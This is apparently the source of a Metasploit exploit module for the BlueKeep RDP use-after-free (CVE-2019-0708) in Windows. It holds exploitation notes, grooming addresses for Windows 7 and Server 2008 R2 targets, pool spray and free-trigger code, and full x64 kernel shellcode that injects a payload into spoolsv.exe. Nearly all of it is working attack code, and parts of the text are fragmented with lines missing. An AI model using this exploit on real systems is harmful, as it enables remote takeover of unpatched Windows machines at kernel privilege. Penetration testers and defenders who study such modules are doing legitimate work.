# This module requires Metasploit:  
# Current source:  
# Exploitation and Caveats from zerosum0x0:  
# 1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally.  
# 2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py)  
# 3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120.  
# 4. RDP has chunked messages, so we use this to groom.  
# a. Chunked messaging ONLY works properly when sent to RDPSND/MS_T120.  
# b. However, on 7+, MS_T120 will not work and you have to use RDPSND.  
# i. RDPSND only works when  
# HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0  
# ii. This registry key is not a default setting for server 2008 R2.  
# We should use alternate groom channels or at least detect the  
# channel in advance.  
# 5. Use chunked grooming to fit new data in the freed channel, account for  
# the allocation header size (like 0x38 I think?). At offset 0x100? is where  
# the "call [rax]" gadget will get its pointer from.  
# a. The NonPagedPool (NPP) starts at a fixed address on XP-7  
# i. Hot-swap memory is another problem because, with certain VMWare and  
# Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP  
# start. This can be anywhere from 100 mb to gigabytes of offset  
# before the NPP start.  
# b. Set offset 0x100 to NPPStart+SizeOfGroomInMB  
# c. Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need  
# [NPPStart+SizeOfGroomInMB+8...payload]... because "call [rax]" is an  
# indirect call  
# d. We are limited to 0x400 payloads by channel chunk max size. My  
# current shellcode is a twin shellcode with eggfinders. I spam the  
# kernel payload and user payload, and if user payload is called first it  
# will egghunt for the kernel payload.  
# 6. After channel hole is filled and the NPP is spammed up with shellcode,  
# trigger the free by closing the socket.  
# TODO:  
# * Detect OS specifics / obtain memory leak to determine NPP start address.  
# * Write the XP/2003 portions grooming MS_T120.  
# * Detect if RDPSND grooming is working or not?  
# * Expand channels besides RDPSND/MS_T120 for grooming.  
# See  
# .. this repo has code for grooming  
# MS_T120 on XP... should be same process as the RDPSND  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ManualRanking  
USERMODE_EGG = 0xb00dac0fefe31337  
KERNELMODE_EGG = 0xb00dac0fefe42069  
CHUNK_SIZE = 0x400  
HEADER_SIZE = 0x48  
include Msf::Exploit::Remote::RDP  
include Msf::Exploit::Remote::CheckScanner  
def initialize(info = {})  
'Name' => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free',  
'Description' => %q(  
The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,  
allowing a malformed Disconnect Provider Indication message to cause use-after-free.  
With a controllable data/size remote nonpaged pool spray, an indirect call gadget of  
the freed channel is used to achieve arbitrary code execution.  
'Author' =>  
'Sean Dillon <>', # @zerosum0x0 - Original exploit  
'Ryan Hanson', # @ryHanson - Original exploit  
'OJ Reeves <>', # @TheColonial - Metasploit module  
'Brent Cook <>', # @busterbcook - Assembly whisperer  
'License' => MSF_LICENSE,  
'References' =>  
['CVE', '2019-0708'],  
['URL', ''],  
'DefaultOptions' =>  
'EXITFUNC' => 'thread',  
'WfsDelay' => 5,  
'RDP_CLIENT_NAME' => 'ethdev',  
'CheckScanner' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep'  
'Privileged' => true,  
'Payload' =>  
'EncoderType' => Msf::Encoder::Type::Raw,  
'Platform' => 'win',  
'Targets' =>  
'Automatic targeting via fingerprinting',  
'Arch' => [ARCH_X64],  
'FingerprintOnly' => true  
# Windows 2008 R2 requires the following registry change from default:  
# [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd]  
# "fDisableCam"=dword:00000000  
'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',  
'Platform' => 'win',  
'Arch' => [ARCH_X64],  
'GROOMBASE' => 0xfffffa8003800000,  
'GROOMSIZE' => 100  
# This works with Virtualbox 6  
'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)',  
'Platform' => 'win',  
'Arch' => [ARCH_X64],  
'GROOMBASE' => 0xfffffa8002407000  
# This address works on VMWare 14  
'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)',  
'Platform' => 'win',  
'Arch' => [ARCH_X64],  
'GROOMBASE' => 0xfffffa8030c00000  
# This address works on VMWare 15  
'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)',  
'Platform' => 'win',  
'Arch' => [ARCH_X64],  
'GROOMBASE' => 0xfffffa8018C00000  
# This address works on VMWare 15.1  
'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)',  
'Platform' => 'win',  
'Arch' => [ARCH_X64],  
'GROOMBASE' => 0xfffffa8018c08000  
'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',  
'Platform' => 'win',  
'Arch' => [ARCH_X64],  
'GROOMBASE' => 0xfffffa8102407000  
'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)',  
'Platform' => 'win',  
'Arch' => [ARCH_X64],  
'GROOMBASE' => 0xfffffa8018c08000  
'DefaultTarget' => 0,  
'DisclosureDate' => 'May 14 2019',  
'Notes' =>  
'AKA' => ['Bluekeep']  
['ForceExploit', [false, 'Override check result', false]),'GROOMSIZE', [true, 'Size of the groom in MB', 250]),'GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]),'GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]),  
def exploit  
unless check == CheckCode::Vulnerable || datastore['ForceExploit']  
fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')  
if target['FingerprintOnly']  
fail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually')  
rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError  
fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')  
is_rdp, server_selected_proto = rdp_check_protocol  
unless is_rdp  
fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')  
# We don't currently support NLA in the mixin or the exploit. However, if we have valid creds, NLA shouldn't stop us  
# from exploiting the target.  
if [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto)  
fail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.')  
chans = [  
@mst120_chan_id = 1004 + chans.length - 1  
unless rdp_negotiate_security(chans, server_selected_proto)  
fail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.')  
# This function is invoked when the PAKID_CORE_CLIENTID_CONFIRM message is  
# received on a channel, and this is when we need to kick off our exploit.  
def rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data)  
# We have to do the default behaviour first.  
super(pkt, user, chan_id, flags, data)  
groom_size = datastore['GROOMSIZE']  
pool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size)  
groom_chan_count = datastore['GROOMCHANNELCOUNT']  
payloads = create_payloads(pool_addr)  
print_status("Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.")  
target_channel_id = chan_id + 1  
spray_buffer = create_exploit_channel_buffer(pool_addr)  
spray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF)  
free_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80  
print_status("Surfing channels ...")  
rdp_send(spray_channel * 1024)  
chan_surf_size = 0x421  
spray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min  
chan_surf_packet = spray_channel * spray_packets  
chan_surf_count = chan_surf_size / spray_packets  
chan_surf_count.times do  
print_status("Lobbing eggs ...")  
groom_mb = groom_size * 1024 / payloads.length  
groom_mb.times do  
tpkts = ''  
for c in 0..groom_chan_count  
payloads.each do |p|  
tpkts += rdp_create_channel_msg(self.rdp_user_id, target_channel_id + c, p, 0, 0xFFFFFFF)  
# Terminating and disconnecting forces the USE  
print_status("Forcing the USE of FREE'd object ...")  
# Helper function to create the kernel mode payload and the usermode payload with  
# the egg hunter prefix.  
def create_payloads(pool_address)  
[kernel_mode_payload, user_mode_payload].map { |p|  
pool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg  
].pack('<Qa*').ljust(CHUNK_SIZE - HEADER_SIZE, "\x00")  
rescue => ex  
print_error("#{ex.backtrace.join("\n")}: #{ex.message} (#{ex.class})")  
def assemble_with_fixups(asm)  
# Rewrite all instructions of form 'lea reg, [rel label]' as relative  
# offsets for the instruction pointer, since metasm's 'ModRM' parser does  
# not grok that syntax.  
lea_rel = /lea+\s(?<dest>\w{2,3}),*\s\[rel+\s(?<label>[a-zA-Z_].*)\]/  
asm.gsub!(lea_rel) do |match|  
match = "lea #{$1}, [rip + #{$2}]"  
# metasm encodes all rep instructions as repnz  
asm.gsub!(/rep+\smovsb/, 'db 0xf3, 0xa4')  
encoded = Metasm::Shellcode.assemble(, asm).encoded  
# Fixup above rewritten instructions with the relative label offsets  
encoded.reloc.each do |offset, reloc|  
target =  
if encoded.export.key?(target)  
# Note: this assumes the address we're fixing up is at the end of the  
# instruction. This holds for 'lea' but if there are other fixups  
# later, this might need to change to account for specific instruction  
# encodings  
if reloc.type == :i32  
instr_offset = offset + 4  
elsif reloc.type == :i16  
instr_offset = offset + 2  
encoded.fixup(target => encoded.export[target] - instr_offset)  
raise "Unknown symbol '#{target}' while resolving relative offsets"  
# The user mode payload has two parts. The first is an egg hunter that searches for  
# the kernel mode payload. The second part is the actual payload that's invoked in  
# user land (ie. it's injected into spoolsrv.exe). We need to spray both the kernel  
# and user mode payloads around the heap in different packets because we don't have  
# enough space to put them both in the same chunk. Given that code exec can result in  
# landing on the user land payload, the egg is used to go to a kernel payload.  
def user_mode_payload  
asm = %Q^  
lea rcx, [rel _start]  
mov r8, 0x#{KERNELMODE_EGG.to_s(16)}  
sub rcx, 0x#{CHUNK_SIZE.to_s(16)}  
sub rax, 0x#{CHUNK_SIZE.to_s(16)}  
mov rdx, [rcx - 8]  
cmp rdx, r8  
jnz _egg_loop  
jmp rcx  
egg_loop = assemble_with_fixups(asm)  
# The USERMODE_EGG is required at the start as well, because the exploit code  
# assumes the tag is there, and jumps over it to find the shellcode.  
def kernel_mode_payload  
# Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya  
# This shellcode was written originally for eternalblue exploits  
# and  
# Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)  
# Note:  
# - The userland shellcode is run in a new thread of system process.  
# If userland shellcode causes any exception, the system process get killed.  
# - On idle target with multiple core processors, the hijacked system call  
# might take a while (> 5 minutes) to get called because the system  
# call may be called on other processors.  
# - The shellcode does not allocate shadow stack if possible for minimal shellcode size.  
# This is ok because some Windows functions do not require a shadow stack.  
# - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.  
# Note: the Windows 8 version macros are removed below  
# - The userland payload MUST be appened to this shellcode.  
# References:  
# - (structures info)  
# -  
data_kapc_offset = 0x10  
data_nt_kernel_addr_offset = 0x8  
data_origin_syscall_offset = 0  
data_peb_addr_offset = -0x10  
data_queueing_kapc_offset = -0x8  
hal_heap_storage = 0xffffffffffd04100  
# These hashes are not the same as the ones used by the  
# Block API so they have to be hard-coded.  
createthread_hash = 0x835e515e  
keinitializeapc_hash = 0x6d195cc4  
keinsertqueueapc_hash = 0xafcc4634  
psgetcurrentprocess_hash = 0xdbf47c78  
psgetprocessid_hash = 0x170114e1  
psgetprocessimagefilename_hash = 0x77645f3f  
psgetprocesspeb_hash = 0xb818b848  
psgetthreadteb_hash = 0xcef84c3e  
spoolsv_exe_hash = 0x3ee083d8  
zwallocatevirtualmemory_hash = 0x576e99ea  
asm = %Q^  
; IRQL is DISPATCH_LEVEL when got code execution  
push rbp  
call set_rbp_data_address_fn  
; read current syscall  
mov ecx, 0xc0000082  
; do NOT replace saved original syscall address with hook syscall  
lea r9, [rel syscall_hook]  
cmp eax, r9d  
je _setup_syscall_hook_done  
; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize  
cmp dword [rbp+#{data_origin_syscall_offset}], eax  
je _hook_syscall  
; save original syscall  
mov dword [rbp+#{data_origin_syscall_offset}+4], edx  
mov dword [rbp+#{data_origin_syscall_offset}], eax  
; first time on the target  
mov byte [rbp+#{data_queueing_kapc_offset}], 0  
; set a new syscall on running processor  
; setting MSR 0xc0000082 affects only running processor  
xchg r9, rax  
push rax  
pop rdx ; mov rdx, rax  
shr rdx, 32  
pop rbp  
;--------------------- HACK crappy thread cleanup --------------------  
; This code is effectively the same as the epilogue of the function that calls  
; the vulnerable function in the kernel, with a tweak or two.  
; TODO: make the lock not suck!!  
mov rax, qword [gs:0x188]  
add word [rax+0x1C4], 1 ; KeGetCurrentThread()->KernelApcDisable++  
lea r11, [rsp+0b8h]  
xor eax, eax  
mov rbx, [r11+30h]  
mov rbp, [r11+40h]  
mov rsi, [r11+48h]  
mov rsp, r11  
pop r15  
pop r14  
pop r13  
pop r12  
pop rdi  
;--------------------- END HACK crappy thread cleanup  
; Find memory address in HAL heap for using as data area  
; Return: rbp = data address  
; On idle target without user application, syscall on hijacked processor might not be called immediately.  
; Find some address to store the data, the data in this address MUST not be modified  
; when exploit is rerun before syscall is called  
;lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000]  
; ------ HACK rbp wasnt valid!  
mov rbp, #{hal_heap_storage} ; TODO: use some other buffer besides HAL heap??  
; --------- HACK end rbp  
;shr rbp, 12  
;shl rbp, 12  
;sub rbp, 0x70 ; for KAPC struct too  
;int 3  
;call $+5  
;pop r13  
mov qword [gs:0x10], rsp  
mov rsp, qword [gs:0x1a8]  
push 0x2b  
push qword [gs:0x10]  
push rax ; want this stack space to store original syscall addr  
; save rax first to make this function continue to real syscall  
push rax  
push rbp ; save rbp here because rbp is special register for accessing this shellcode data  
call set_rbp_data_address_fn  
mov rax, [rbp+#{data_origin_syscall_offset}]  
add rax, 0x1f ; adjust syscall entry, so we do not need to reverse start of syscall handler  
mov [rsp+0x10], rax  
; save all volatile registers  
push rcx  
push rdx  
push r8  
push r9  
push r10  
push r11  
; use lock cmpxchg for queueing APC only one at a time  
xor eax, eax  
mov dl, 1  
lock cmpxchg byte [rbp+#{data_queueing_kapc_offset}], dl  
jnz _syscall_hook_done  
; restore syscall  
; an error after restoring syscall should never occur  
mov ecx, 0xc0000082  
mov eax, [rbp+#{data_origin_syscall_offset}]  
mov edx, [rbp+#{data_origin_syscall_offset}+4]  
; allow interrupts while executing shellcode  
call r3_to_r0_start  
pop r11  
pop r10  
pop r9  
pop r8  
pop rdx  
pop rcx  
pop rbp  
pop rax  
; save used non-volatile registers  
push r15  
push r14  
push rdi  
push rsi  
push rbx  
push rax ; align stack by 0x10  
; find nt kernel address  
mov r15, qword [rbp+#{data_origin_syscall_offset}] ; KiSystemCall64 is an address in nt kernel  
shr r15, 0xc ; strip to page size  
shl r15, 0xc  
sub r15, 0x1000 ; walk along page size  
cmp word [r15], 0x5a4d ; 'MZ' header  
jne _x64_find_nt_walk_page  
; save nt address for using in KernelApcRoutine  
mov [rbp+#{data_nt_kernel_addr_offset}], r15  
; get current EPROCESS and ETHREAD  
mov r14, qword [gs:0x188] ; get _ETHREAD pointer from KPCR  
mov edi, #{psgetcurrentprocess_hash}  
call win_api_direct  
xchg rcx, rax ; rcx = EPROCESS  
; r15 : nt kernel address  
; r14 : ETHREAD  
; rcx : EPROCESS  
; find offset of EPROCESS.ImageFilename  
mov edi, #{psgetprocessimagefilename_hash}  
call get_proc_addr  
mov eax, dword [rax+3] ; get offset from code (offset of ImageFilename is always > 0x7f)  
mov ebx, eax ; ebx = offset of EPROCESS.ImageFilename  
; find offset of EPROCESS.ThreadListHead  
; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)  
; if offset of ImageFilename is more than 0x400, current is (Win8+)  
cmp eax, 0x400 ; eax is still an offset of EPROCESS.ImageFilename  
jb _find_eprocess_threadlist_offset_win7  
add eax, 0x10  
lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead  
; find offset of ETHREAD.ThreadListEntry  
lea r8, [rcx+rdx] ; r8 = address of EPROCESS.ThreadListHead  
mov r9, r8  
; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700  
mov r9, qword [r9]  
cmp r8, r9 ; check end of list  
je _insert_queue_apc_done ; not found !!!  
; if (r9 - r14 < 0x700) found  
mov rax, r9  
sub rax, r14  
cmp rax, 0x700  
ja _find_ethread_threadlist_offset_loop  
sub r14, r9 ; r14 = -(offset of ETHREAD.ThreadListEntry)  
; find offset of EPROCESS.ActiveProcessLinks  
mov edi, #{psgetprocessid_hash}  
call get_proc_addr  
mov edi, dword [rax+3] ; get offset from code (offset of UniqueProcessId is always > 0x7f)  
add edi, 8 ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)  
; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock  
; check process name  
xor eax, eax ; HACK to exit earlier if process not found  
lea rsi, [rcx+rbx]  
push rax  
call calc_hash  
cmp eax, #{spoolsv_exe_hash} ; "spoolsv.exe"  
pop rax  
jz found_target_process  
;---------- HACK PROCESS NOT FOUND start -----------  
inc rax  
cmp rax, 0x300 ; HACK not found!  
jne _next_find_target_process  
xor ecx, ecx  
; clear queueing kapc flag, allow other hijacked system call to run shellcode  
mov byte [rbp+#{data_queueing_kapc_offset}], cl  
jmp _r3_to_r0_done  
;---------- HACK PROCESS NOT FOUND end -----------  
; next process  
mov rcx, [rcx+rdi]  
sub rcx, rdi  
jmp _find_target_process_loop  
; The allocation for userland payload will be in KernelApcRoutine.  
; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()  
; save process PEB for finding CreateThread address in kernel KAPC routine  
mov edi, #{psgetprocesspeb_hash}  
; rcx is EPROCESS. no need to set it.  
call win_api_direct  
mov [rbp+#{data_peb_addr_offset}], rax  
; iterate ThreadList until KeInsertQueueApc() success  
; r15 = nt  
; r14 = -(offset of ETHREAD.ThreadListEntry)  
; rcx = EPROCESS  
; edx = offset of EPROCESS.ThreadListHead  
lea rsi, [rcx + rdx] ; rsi = ThreadListHead address  
mov rbx, rsi ; use rbx for iterating thread  
; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.  
; Moreover, alertable thread need to be waiting state which is more difficult to check.  
; try queueing APC then check KAPC member is more reliable.  
; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front  
mov rbx, [rbx+8]  
cmp rsi, rbx  
je _insert_queue_apc_loop ; skip list head  
; find start of ETHREAD address  
; set it to rdx to be used for KeInitializeApc() argument too  
lea rdx, [rbx + r14] ; ETHREAD  
; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.  
; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.  
; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.  
; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.  
; Teb member is next to Queue member.  
mov edi, #{psgetthreadteb_hash}  
call get_proc_addr  
mov eax, dword [rax+3] ; get offset from code (offset of Teb is always > 0x7f)  
cmp qword [rdx+rax-8], 0 ; KTHREAD.Queue MUST not be NULL  
je _insert_queue_apc_loop  
; KeInitializeApc(PKAPC,  
; KAPC_ENVIRONMENT = OriginalApcEnvironment (0),  
; PKKERNEL_ROUTINE = kernel_apc_routine,  
; PKNORMAL_ROUTINE = userland_shellcode,  
; KPROCESSOR_MODE = UserMode (1),  
; PVOID Context);  
lea rcx, [rbp+#{data_kapc_offset}] ; PAKC  
xor r8, r8 ; OriginalApcEnvironment  
lea r9, [rel kernel_kapc_routine] ; KernelApcRoutine  
push rbp ; context  
push 1 ; UserMode  
push rbp ; userland shellcode (MUST NOT be NULL)  
push r8 ; NULL  
sub rsp, 0x20 ; shadow stack  
mov edi, #{keinitializeapc_hash}  
call win_api_direct  
; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later  
; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);  
; SystemArgument1 is second argument in usermode code (rdx)  
; SystemArgument2 is third argument in usermode code (r8)  
lea rcx, [rbp+#{data_kapc_offset}]  
;xor edx, edx ; no need to set it here  
;xor r8, r8 ; no need to set it here  
xor r9, r9  
mov edi, #{keinsertqueueapc_hash}  
call win_api_direct  
add rsp, 0x40  
; if insertion failed, try next thread  
test eax, eax  
jz _insert_queue_apc_loop  
mov rax, [rbp+#{data_kapc_offset}+0x10] ; get KAPC.ApcListEntry  
; EPROCESS pointer 8 bytes  
; InProgressFlags 1 byte  
; KernelApcPending 1 byte  
; if success, UserApcPending MUST be 1  
cmp byte [rax+0x1a], 1  
je _insert_queue_apc_done  
; manual remove list without lock  
mov [rax], rax  
mov [rax+8], rax  
jmp _insert_queue_apc_loop  
; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.  
pop rax  
pop rbx  
pop rsi  
pop rdi  
pop r14  
pop r15  
; Call function in specific module  
; All function arguments are passed as calling normal function with extra register arguments  
; Extra Arguments: r15 = module pointer  
; edi = hash of target function name  
call get_proc_addr  
jmp rax  
; Get function address in specific module  
; Arguments: r15 = module pointer  
; edi = hash of target function name  
; Return: eax = offset  
; Save registers  
push rbx  
push rcx  
push rsi ; for using calc_hash  
; use rax to find EAT  
mov eax, dword [r15+60] ; Get PE header e_lfanew  
mov eax, dword [r15+rax+136] ; Get export tables RVA  
add rax, r15  
push rax ; save EAT  
mov ecx, dword [rax+24] ; NumberOfFunctions  
mov ebx, dword [rax+32] ; FunctionNames  
add rbx, r15  
; When we reach the start of the EAT (we search backwards), we hang or crash  
dec ecx ; decrement NumberOfFunctions  
mov esi, dword [rbx+rcx*4] ; Get rva of next module name  
add rsi, r15 ; Add the modules base address  
call calc_hash  
cmp eax, edi ; Compare the hashes  
jnz _get_proc_addr_get_next_func ; try the next function  
pop rax ; restore EAT  
mov ebx, dword [rax+36]  
add rbx, r15 ; ordinate table virtual address  
mov cx, word [rbx+rcx*2] ; desired functions ordinal  
mov ebx, dword [rax+28] ; Get the function addresses table rva  
add rbx, r15 ; Add the modules base address  
mov eax, dword [rbx+rcx*4] ; Get the desired functions RVA  
add rax, r15 ; Add the modules base address to get the functions actual VA  
pop rsi  
pop rcx  
pop rbx  
; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.  
; Argument: rsi = string to hash  
; Clobber: rsi  
; Return: eax = hash  
push rdx  
xor eax, eax  
lodsb ; Read in the next byte of the ASCII string  
ror edx, 13 ; Rotate right our hash value  
add edx, eax ; Add the next byte of the string  
test eax, eax ; Stop when found NULL  
jne _calc_hash_loop  
xchg edx, eax  
pop rdx  
; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.  
; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().  
; Moreover, there is no lock when calling KernelApcRoutine.  
; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.  
; VOID KernelApcRoutine(  
; IN PKAPC Apc,  
; IN PKNORMAL_ROUTINE *NormalRoutine,  
; IN PVOID *NormalContext,  
; IN PVOID *SystemArgument1,  
; IN PVOID *SystemArgument2)  
push rbp  
push rbx  
push rdi  
push rsi  
push r15  
mov rbp, [r8] ; *NormalContext is our data area pointer  
mov r15, [rbp+#{data_nt_kernel_addr_offset}]  
push rdx  
pop rsi ; mov rsi, rdx  
mov rbx, r9  
; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)  
xor eax, eax  
mov cr8, rax ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)  
; rdx is already address of baseAddr  
mov [rdx], rax ; baseAddr = 0  
mov ecx, eax  
not rcx ; ProcessHandle = -1  
mov r8, rax ; ZeroBits  
mov al, 0x40 ; eax = 0x40  
push rax ; PAGE_EXECUTE_READWRITE = 0x40  
shl eax, 6 ; eax = 0x40 << 6 = 0x1000  
push rax ; MEM_COMMIT = 0x1000  
; reuse r9 for address of RegionSize  
mov [r9], rax ; RegionSize = 0x1000  
sub rsp, 0x20 ; shadow stack  
mov edi, #{zwallocatevirtualmemory_hash}  
call win_api_direct  
add rsp, 0x30  
; check error  
test eax, eax  
jnz _kernel_kapc_routine_exit  
; copy userland payload  
mov rdi, [rsi]  
;--------------------------- HACK IN EGG USER ---------  
push rdi  
lea rsi, [rel shellcode_start]  
mov rdi, 0x#{USERMODE_EGG.to_s(16)}  
sub rsi, 0x#{CHUNK_SIZE.to_s(16)}  
mov rax, [rsi - 8]  
cmp rax, rdi  
jnz _find_user_egg_loop  
inc rsi  
mov rax, [rsi - 8]  
cmp rax, rdi  
jnz _inner_find_user_egg_loop  
pop rdi  
;--------------------------- END HACK EGG USER ------------  
mov ecx, 0x380 ; fix payload size to 0x380 bytes  
rep movsb  
; find CreateThread address (in kernel32.dll)  
mov rax, [rbp+#{data_peb_addr_offset}]  
mov rax, [rax + 0x18] ; PEB->Ldr  
mov rax, [rax + 0x20] ; InMemoryOrder list  
;lea rsi, [rcx + rdx] ; rsi = ThreadListHead address  
;mov rbx, rsi ; use rbx for iterating thread  
mov rax, [rax] ; first one always be executable  
; offset 0x38 (WORD) => must be 0x40 (full name len c:\windows\system32\kernel32.dll)  
; offset 0x48 (WORD) => must be 0x18 (name len kernel32.dll)  
; offset 0x50 => is name  
; offset 0x20 => is dllbase  
;cmp word [rax+0x38], 0x40  
;jne _find_kernel32_dll_loop  
cmp word [rax+0x48], 0x18  
jne _find_kernel32_dll_loop  
mov rdx, [rax+0x50]  
; check only "32" because name might be lowercase or uppercase  
cmp dword [rdx+0xc], 0x00320033 ; 3\x002\x00  
jnz _find_kernel32_dll_loop  
mov r15, [rax+0x20]  
mov edi, #{createthread_hash}  
call get_proc_addr  
; save CreateThread address to SystemArgument1  
mov [rbx], rax  
xor ecx, ecx  
; clear queueing kapc flag, allow other hijacked system call to run shellcode  
mov byte [rbp+#{data_queueing_kapc_offset}], cl  
; restore IRQL to APC_LEVEL  
mov cl, 1  
mov cr8, rcx  
pop r15  
pop rsi  
pop rdi  
pop rbx  
pop rbp  
; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)  
xchg rdx, rax ; rdx is CreateThread address passed from kernel  
xor ecx, ecx ; lpThreadAttributes = NULL  
push rcx ; lpThreadId = NULL  
push rcx ; dwCreationFlags = 0  
mov r9, rcx ; lpParameter = NULL  
lea r8, [rel userland_payload] ; lpStartAddr  
mov edx, ecx ; dwStackSize = 0  
sub rsp, 0x20  
call rax  
add rsp, 0x30  
def create_free_trigger(chan_user_id, chan_id)  
# malformed Disconnect Provider Indication PDU (opcode: 0x2, total_size != 0x20)  
vprint_status("Creating free trigger for user #{chan_user_id} on channel #{chan_id}")  
# The extra bytes on the end of the body is what causes the bad things to happen  
body = "\x00\x00\x00\x00\x00\x00\x00\x00\x02" + "\x00" * 22  
rdp_create_channel_msg(chan_user_id, chan_id, body, 3, 0xFFFFFFF)  
def create_exploit_channel_buffer(target_addr)  
overspray_addr = target_addr + 0x2000  
shellcode_vtbl = target_addr + HEADER_SIZE  
magic_value1 = overspray_addr + 0x810  
magic_value2 = overspray_addr + 0x48  
magic_value3 = overspray_addr + CHUNK_SIZE + HEADER_SIZE  
# first 0x38 bytes are used by DATA PDU packet  
# exploit channel starts at +0x38, which is +0x20 of an _ERESOURCE  
# SystemResourceList (2 pointers, each 8 bytes)  
# Pointer to OWNER_ENTRY (8 bytes)  
# ActiveCount (SHORT, 2 bytes)  
# Flag (WORD, 2 bytes)  
# Padding (BYTE[4], 4 bytes) x64 only  
0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)  
0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)  
magic_value2, # OwnerThread (ULONG, 8 bytes)  
magic_value2, # TableSize (ULONG, 8 bytes)  
0x0, # ActiveEntries (DWORD, 4 bytes)  
0x0, # ContenttionCount (DWORD, 4 bytes)  
0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)  
0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)  
0x0, # Reserved2 (PVOID, 8 bytes) x64 only  
magic_value2, # Address (PVOID, 8 bytes)  
0x0, # SpinLock (UINT_PTR, 8 bytes)  
magic_value2, # SystemResourceList (2 pointers, each 8 bytes)  
magic_value2, # --------------------  
0x0, # Pointer to OWNER_ENTRY (8 bytes)  
0x0, # ActiveCount (SHORT, 2 bytes)  
0x0, # Flag (WORD, 2 bytes)  
0x0, # Padding (BYTE[4], 4 bytes) x64 only  
0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)  
0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)  
magic_value2, # OwnerThread (ULONG, 8 bytes)  
magic_value2, # TableSize (ULONG, 8 bytes)  
0x0, # ActiveEntries (DWORD, 4 bytes)  
0x0, # ContenttionCount (DWORD, 4 bytes)  
0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)  
0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)  
0x0, # Reserved2 (PVOID, 8 bytes) x64 only  
magic_value2, # Address (PVOID, 8 bytes)  
0x0, # SpinLock (UINT_PTR, 8 bytes)  
0x1F, # ClassOffset (DWORD, 4 bytes)  
0x0, # bindStatus (DWORD, 4 bytes)  
0x72, # lockCount1 (QWORD, 8 bytes)  
magic_value3, # connection (QWORD, 8 bytes)  
shellcode_vtbl, # shellcode vtbl ? (QWORD, 8 bytes)  
